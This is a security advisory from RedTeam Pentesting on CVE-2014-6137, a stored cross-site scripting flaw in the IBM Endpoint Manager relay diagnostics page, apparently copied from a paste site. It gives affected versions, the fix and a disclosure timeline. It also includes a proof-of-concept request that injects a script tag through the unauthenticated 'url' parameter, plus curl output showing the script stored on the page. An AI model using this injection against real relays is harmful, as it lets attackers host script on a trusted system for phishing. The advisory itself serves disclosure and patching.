150 lines
No EOL
5 KiB
Text
150 lines
No EOL
5 KiB
Text
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
|
|
Page
|
|
|
|
During a penetration test, RedTeam Pentesting discovered that the IBM
|
|
Endpoint Manager Relay Diagnostics page allows anybody to persistently
|
|
store HTML and JavaScript code that is executed when the page is opened
|
|
in a browser.
|
|
|
|
|
|
Details
|
|
=======
|
|
|
|
Product: IBM Endpoint Manager
|
|
Affected Versions: 9.1.x versions earlier than 9.1.1229,
|
|
9.2.x versions earlier than 9.2.1.48
|
|
Fixed Versions: 9.1.1229, 9.2.1.48
|
|
Vulnerability Type: Cross-Site Scripting
|
|
Security Risk: medium
|
|
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
|
|
Vendor Status: fixed version released
|
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
|
|
Advisory Status: published
|
|
CVE: CVE-2014-6137
|
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137
|
|
|
|
|
|
Introduction
|
|
============
|
|
|
|
IBM Endpoint Manager products - built on IBM BigFix technology - can
|
|
help you achieve smarter, faster endpoint management and security. These
|
|
products enable you to see and manage physical and virtual endpoints
|
|
including servers, desktops, notebooks, smartphones, tablets and
|
|
specialized equipment such as point-of-sale devices, ATMs and
|
|
self-service kiosks. Now you can rapidly remediate, protect and report
|
|
on endpoints in near real time.
|
|
|
|
(from the vendor's homepage)
|
|
|
|
|
|
More Details
|
|
============
|
|
|
|
Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
|
|
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
|
|
typically serve HTTP and HTTPS on port 52311. There, the server or relay
|
|
diagnostics page is normally accessible at the path /rd. That page can
|
|
be accessed without authentication and lets users query and modify
|
|
different information. For example, a TEM Relay can be instructed to
|
|
gather a specific version of a certain Fixlet site by requesting a URL
|
|
such as the following:
|
|
|
|
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
|
|
BESGatherMirrorNew.exe/-gatherversion
|
|
?Body=GatherSpecifiedVersion
|
|
&url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
|
|
&version=1
|
|
&useCRC=0
|
|
|
|
The URL parameter url is susceptible to cross-site scripting. When the
|
|
following URL is requested, the browser executes the JavaScript code
|
|
provided in the parameter:
|
|
|
|
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
|
|
BESGatherMirrorNew.exe/-gatherversion
|
|
?Body=GatherSpecifiedVersion
|
|
&version=1
|
|
&url=http://"><script>alert(/XSS/)</script>
|
|
&version=1
|
|
&useCRC=0
|
|
|
|
The value of that parameter is also stored in the TEM Relay's site list,
|
|
so that the embedded JavaScript code is executed whenever the
|
|
diagnostics page is opened in a browser:
|
|
|
|
$ curl http://tem-relay.example.com:52311/rd
|
|
[...]
|
|
|
|
<select NAME="url">
|
|
[...]
|
|
<option>http://"><script>alert(/XSS/)</script></option>
|
|
</select>
|
|
|
|
|
|
Proof of Concept
|
|
================
|
|
|
|
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
|
|
BESGatherMirrorNew.exe/-gatherversion
|
|
?Body=GatherSpecifiedVersion&version=1
|
|
&url=http://"><script>alert(/XSS/)</script>
|
|
&version=1
|
|
&useCRC=0
|
|
|
|
|
|
Fix
|
|
===
|
|
|
|
Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.
|
|
|
|
|
|
Security Risk
|
|
=============
|
|
|
|
As the relay diagnostics page is typically not frequented by
|
|
administrators and does not normally require authentication, it is
|
|
unlikely that the vulnerability can be exploited to automatically and
|
|
reliably attack administrative users and obtain their credentials.
|
|
|
|
Nevertheless, the ability to host arbitrary HTML and JavaScript code on
|
|
the relay diagnostics page, i.e. on a trusted system, may allow
|
|
attackers to conduct very convincing phishing attacks.
|
|
|
|
This vulnerability is therefore rated as a medium risk.
|
|
|
|
|
|
Timeline
|
|
========
|
|
|
|
2014-07-29 Vulnerability identified during a penetration test
|
|
2014-08-06 Customer approves disclosure to vendor
|
|
2014-09-03 Vendor notified
|
|
2015-01-13 Vendor releases security bulletin and software upgrade
|
|
2015-02-04 Customer approves public disclosure
|
|
2015-02-10 Advisory released
|
|
|
|
|
|
RedTeam Pentesting GmbH
|
|
=======================
|
|
|
|
RedTeam Pentesting offers individual penetration tests, short pentests,
|
|
performed by a team of specialised IT-security experts. Hereby, security
|
|
weaknesses in company networks or products are uncovered and can be
|
|
fixed immediately.
|
|
|
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
|
share its knowledge and enhance the public knowledge with research in
|
|
security-related areas. The results are made available as public
|
|
security advisories.
|
|
|
|
More information about RedTeam Pentesting can be found at
|
|
https://www.redteam-pentesting.de.
|
|
|
|
|
|
--
|
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
|
52068 Aachen https://www.redteam-pentesting.de
|
|
Germany Registergericht: Aachen HRB 14004
|
|
Geschäftsführer: Patrick Hof, Jens Liebchen |